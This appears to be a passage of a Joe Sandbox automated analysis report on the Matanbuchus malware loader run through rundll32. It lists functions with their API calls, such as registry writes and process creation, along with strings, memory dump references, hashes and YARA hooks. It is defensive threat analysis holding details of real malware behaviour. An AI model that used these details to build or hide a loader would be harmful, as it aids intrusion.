                                                • Opcode ID: 2fb086a877c1a97c7ebaad3cb85460a821f7150255d7345a93410c3c27623075
                                                • Instruction ID: b4d846cecccb938fa3b5432055280ed949844833fcbf9fdecf3887cf627d8c25
                                                • Opcode Fuzzy Hash: 2fb086a877c1a97c7ebaad3cb85460a821f7150255d7345a93410c3c27623075
                                                • Instruction Fuzzy Hash: B2C1E775E1070B77D7166B28DD44F9BB2FEDF45304F080269ED16AA216F730AB42CAA1
                                                Function 7F29C1A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F29C27E, 7F29C424
                                                • @, xrefs: 7F29C40D
                                                • d, xrefs: 7F29C445
                                                • d, xrefs: 7F29C2E0
                                                • n_chars < number_buffer.size() - 1, xrefs: 7F29C429
                                                • d, xrefs: 7F29C39C
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7F29C283
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                • Opcode ID: 4975ae7da7915d2a36f235a6a178031bf8b872241c49dd82abc2fc1d6ee5c84d
                                                • Instruction ID: 5182f172521b560eb2ddab740500087fee5211d3abd624f953c963ee2b8f5a71
                                                • Opcode Fuzzy Hash: 4975ae7da7915d2a36f235a6a178031bf8b872241c49dd82abc2fc1d6ee5c84d
                                                • Instruction Fuzzy Hash: E6F1D274E4125ADFDB14CF98C890B9DBBB2BF48304F1081AAD91AB7364D7746A84CF58
                                                Function 7F29C650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                • Opcode ID: 96cc1bc63790f1f925c283b01c4ed480eff7c6f7b17e1b86afb721321102c61f
                                                • Instruction ID: a91a63bf4daa107c3b5285cafcf030f4183cc91bd545021c068fa25d3f2577ff
                                                • Opcode Fuzzy Hash: 96cc1bc63790f1f925c283b01c4ed480eff7c6f7b17e1b86afb721321102c61f
                                                • Instruction Fuzzy Hash: DFE1AE74E0121ADFDB15CF98C880ADDBBB6BB48304F2081AAD519BB354D7346A81CF59
                                                Function 7F2EEF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,00000000,00000044,00000000), ref: 7F2EEF39
                                                • wsprintfW.USER32 ref: 7F2EEF86
                                                • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F2EEFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,?), ref: 7F2EEFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F2EEFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F2EEFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F2EF008
                                                  • Part of subcall function 7F2EF6E7: GetTickCount.KERNEL32 ref: 7F2EF705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                • API String ID: 730945307-550109914
                                                • Opcode ID: c2483fefbd0679602c68ef51f6a430a5b6c581502e8e51e8d33d58b6760f06b0
                                                • Instruction ID: b87657bbf0b95978ca8487edf76dfe1513039635661dd7d33b29305bc5b0b850
                                                • Opcode Fuzzy Hash: c2483fefbd0679602c68ef51f6a430a5b6c581502e8e51e8d33d58b6760f06b0
                                                • Instruction Fuzzy Hash: E3314972A00619BBDB219A95CC49FDFBF7DEF083A0F500065FA09E6060D730AB54DBA0
                                                Function 7F2EF11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7F2EF149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7F2EF150
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F2EF18C
                                                • wsprintfW.USER32 ref: 7F2EF21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                • API String ID: 3386633596-4137330559
                                                • Opcode ID: 7830424e988e97b8d8efe02addcf1a8cc465bf7dad08977b727ecffa67895ed5
                                                • Instruction ID: 09fb2952cb5854bf98f22260eee35dbb13368b45b821aeae8051176717569df0
                                                • Opcode Fuzzy Hash: 7830424e988e97b8d8efe02addcf1a8cc465bf7dad08977b727ecffa67895ed5
                                                • Instruction Fuzzy Hash: 1B814EB2D01209AFEF01DBA4CD89FEEB7BDEF08244FA40065E915E6150E7359E508B61
                                                Function 7F3105F3 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7F30FF5F), ref: 7F31060C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: d741a361f5590bb19267c2f122c20167a5b05a6d8e8f3ff640234156d674cedc
                                                • Instruction ID: e238965e0abf8a80af53a6c0bb7434a938240d8e277c851919aec2536e7192d4
                                                • Opcode Fuzzy Hash: d741a361f5590bb19267c2f122c20167a5b05a6d8e8f3ff640234156d674cedc
                                                • Instruction Fuzzy Hash: 3D519EB9900E0BCBDB0A8F65E9481EDBF78FF45310F214289D896AF258CB359529CF54
                                                Function 7F2F41B1 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 7F2F42D0
                                                • ___TypeMatch.LIBVCRUNTIME ref: 7F2F43DE
                                                • _UnwindNestedFrames.LIBCMT ref: 7F2F4530
                                                • CallUnexpected.LIBVCRUNTIME ref: 7F2F454B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: 0b2f3c1ba285eee9d1ecfc4527b989c863ea0ab0b877729641fd32bc594ae359
                                                • Instruction ID: fc995737099dd54bc6a8ccd5f9b56ca2e56ce171007c42e6b6da62f5b20aaa01
                                                • Opcode Fuzzy Hash: 0b2f3c1ba285eee9d1ecfc4527b989c863ea0ab0b877729641fd32bc594ae359
                                                • Instruction Fuzzy Hash: 4BB1797182830AEFCF06CFA4D880E9EFBF5EF04314B50416AE8126B655D7B1EA51CB91
                                                Function 6C35FE80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FEB7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6C35FEBF
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FF48
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6C35FF73
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FFC8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1170836740-3733052814
                                                • Opcode ID: 4c0b48553c7b29ebf4762214f9b30032375cdcd0f1fd4ec8d596ce029bbd2957
                                                • Instruction ID: 2bc0f4f23aa63b88a7454fb2cdec19c865032af52bafc72d7e1807a4368c4e4f
                                                • Opcode Fuzzy Hash: 4c0b48553c7b29ebf4762214f9b30032375cdcd0f1fd4ec8d596ce029bbd2957
                                                • Instruction Fuzzy Hash: 9751D134A012049FCF00DF6AC840AAE7BB5FF46318F608199E8559BF95C732D915CFA5
                                                Function 7F2EC5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F2EC78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F2EC7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                • API String ID: 515556390-2230072418
                                                • Opcode ID: 85a70cfcf2884185b3db0b690f5a54fdfb9d4904b33d51da38835d92cd12c500
                                                • Instruction ID: eb452fc51d5f68f85b324e4329bde85919e70bd1cfd7e127ed4c2305927ae71f
                                                • Opcode Fuzzy Hash: 85a70cfcf2884185b3db0b690f5a54fdfb9d4904b33d51da38835d92cd12c500
                                                • Instruction Fuzzy Hash: 33B154B9D052A8CFDB15CFAAC84079DBBB5BB48310F24819ED458E7396DB342A81CF50
                                                Function 6C354C40 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 153COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C354DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 2188284642-435796455
                                                • Opcode ID: 3125cead020b2ac3a27081b544d245836a0acb31744c5c89ed3ff4cfa018b286
                                                • Instruction ID: 84d9bb49aaf83d7a77eb7072fe0e5cf0a4327648815cbb81a457292a547763b9
                                                • Opcode Fuzzy Hash: 3125cead020b2ac3a27081b544d245836a0acb31744c5c89ed3ff4cfa018b286
                                                • Instruction Fuzzy Hash: 80713D74A042A8CFDF16CFA9C4846ADBBF5BB4A300F149199D498E7381E7348545CF69
                                                Function 7F2F3BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7F2F3C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7F2F3CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3D28
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 33a4b716d949b511732623fefb2620c827cc79b43025a773bae4bd3a22305f83
                                                • Instruction ID: 35dd5f26fbce6f6d357b9e2a1e90b4c9630eb8d0ef1393d59fa97c9ac75b7a00
                                                • Opcode Fuzzy Hash: 33a4b716d949b511732623fefb2620c827cc79b43025a773bae4bd3a22305f83
                                                • Instruction Fuzzy Hash: 3D41AE34A2530AABCF00CF69C880B9EFBF5EF44224F148159EC269B351D731AE15DB90
                                                Function 6C35CEF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6C35D09A
                                                • Sleep.KERNEL32(00000064), ref: 6C35D0A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepWindows
                                                • String ID: )$X$Z$t
                                                • API String ID: 1499897475-3436847989
                                                • Opcode ID: b68b07038a085a4b74c4b0cc18ab2f5f87be5e17143d11ee219b4546388574c3
                                                • Instruction ID: c9576b693f3ba88bdaf7a719f3f7b4fe97ff74b526da3308fe8daf5d814fc925
                                                • Opcode Fuzzy Hash: b68b07038a085a4b74c4b0cc18ab2f5f87be5e17143d11ee219b4546388574c3
                                                • Instruction Fuzzy Hash: 885114B4E043A8CAEB15CFA9C44069DBBB5FF5A304F1091A9D458AB351D3344A45CF69
                                                Function 7F2E3E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F2E3F69
                                                • false, xrefs: 7F2E3F6E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: dc0dd0316fc422b9fb9f9814da39f2aef15ff0ef6c3b744747d22b240e03fb73
                                                • Instruction ID: 639ed9629f1f7c7f02e35fedb63596e085c3c8875b696c1496bbf396b732da07
                                                • Opcode Fuzzy Hash: dc0dd0316fc422b9fb9f9814da39f2aef15ff0ef6c3b744747d22b240e03fb73
                                                • Instruction Fuzzy Hash: E4212C71A14309EBCB08CFA4C894EEEB7B5FF84700F188599E9126B640DF31AA19DB55
                                                Function 7F2E3D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F2E3E49
                                                • false, xrefs: 7F2E3E4E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 4009e0baf83091191d21dc4909794e18956ec9dbada5cc91ecd09d29b232d815
                                                • Instruction ID: de675bd8160ecda5c6523ca74908db94aa6e91dc2b050edcabe881e519d491d5
                                                • Opcode Fuzzy Hash: 4009e0baf83091191d21dc4909794e18956ec9dbada5cc91ecd09d29b232d815
                                                • Instruction Fuzzy Hash: AA215C71A04309EBCB08CFA4C890EEEB7B5FF84700F588599E9522B640DF31AE19DB15
                                                Function 7F30402E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7F30413B,7F301108,0000000C,7F3152A0,00000000,00000000,?,7F304388,00000021,FlsSetValue,7F31D860,7F31D868,7F3152A0), ref: 7F3040EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: ed9ef7c245020f0544cfb34f8a627dbd5100785434de52db2c8a664d9d9693a2
                                                • Instruction ID: 364af5a684fe0ead1a49fcdf2ea47e030d344180c4718bc7bfd6db4a522501d7
                                                • Opcode Fuzzy Hash: ed9ef7c245020f0544cfb34f8a627dbd5100785434de52db2c8a664d9d9693a2
                                                • Instruction Fuzzy Hash: AC21DB36605711EBE7127B61CC40A4AB76EEB42371F250126ED06BB280E730FF11C6E8
                                                Function 6C35BD80 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 3472027048-435796455
                                                • Opcode ID: 093a1faf254022d1feb103592bfd24fcd95113bc95a60e89ffd7a3e6bbec4ea9
                                                • Instruction ID: fe5023f00aff5762477a34127a689d2af33a03f627f5f0a06321bc4ac42a482a
                                                • Opcode Fuzzy Hash: 093a1faf254022d1feb103592bfd24fcd95113bc95a60e89ffd7a3e6bbec4ea9
                                                • Instruction Fuzzy Hash: F1916D70E052A8DFDF11CFA8D484ADDBBB9BB0A314F509199D058AB341D3359A44CFA9
                                                Function 7F2F04DC Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7F2F0525
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7F2F0590
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F2F05AD
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7F2F05EC
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F2F064B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7F2F066E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiStringWide
                                                • String ID:
                                                • API String ID: 2829165498-0
                                                • Opcode ID: 62e4a3e14d1c9694e280235e983558fa2ce2b4ce7cafcf288c9c88eb0f7a719a
                                                • Instruction ID: 4adc52d1b69a5442e1f2a6fd35e25bf5c26a4d6c1b1823d1914d52bcf3c28702
                                                • Opcode Fuzzy Hash: 62e4a3e14d1c9694e280235e983558fa2ce2b4ce7cafcf288c9c88eb0f7a719a
                                                • Instruction Fuzzy Hash: 5A518076A2030BAFEB118FA5CC44FABBBF9EF84761F114129F916D6190D774A810CB60
                                                Function 7F2F3E43 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,7F2F3E3A,7F2F1A31,7F2F07C3), ref: 7F2F3E51
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7F2F3E5F
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7F2F3E78
                                                • SetLastError.KERNEL32(00000000,?,7F2F3E3A,7F2F1A31,7F2F07C3), ref: 7F2F3ECA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 496c2f5c951cfa19c77e593be87adc292d34174e1f289265ffff4d4e8bf4af29
                                                • Instruction ID: ca4dcda98b1aab37304426546941b60c55f2dc7e790457c5f89e5571002c2fcf
                                                • Opcode Fuzzy Hash: 496c2f5c951cfa19c77e593be87adc292d34174e1f289265ffff4d4e8bf4af29
                                                • Instruction Fuzzy Hash: D101F73B13F7129EE31605759C85F4BA6D8DF0A6B6734032DF522861D0EF625C21F191
                                                Function 6C3551C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *$8$TMP
                                                • API String ID: 0-2442449778
                                                • Opcode ID: 13a0c4451d135f2ebd901ae8be016aca17423051db3a4fb97080b4ba4a19ed21
                                                • Instruction ID: 7b66d868b319b651bd04a058d8d697215402fa81d268c268e3916578145f81de
                                                • Opcode Fuzzy Hash: 13a0c4451d135f2ebd901ae8be016aca17423051db3a4fb97080b4ba4a19ed21
                                                • Instruction Fuzzy Hash: 63E11AB4E05268CFDB16CF69C844BADBBF5FB4A304F10959AD448A7350D7349A80CF69
                                                Function 7F2FF245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F2FF265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F2FF277
                                                • swprintf.LIBCMT ref: 7F2FF298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F2FF2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F2FF28D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                • API String ID: 2943507729-1719349581
                                                • Opcode ID: 74d6f88e90dd893a090c103c4109af082bbff934e06af16182672fe97f44aebc
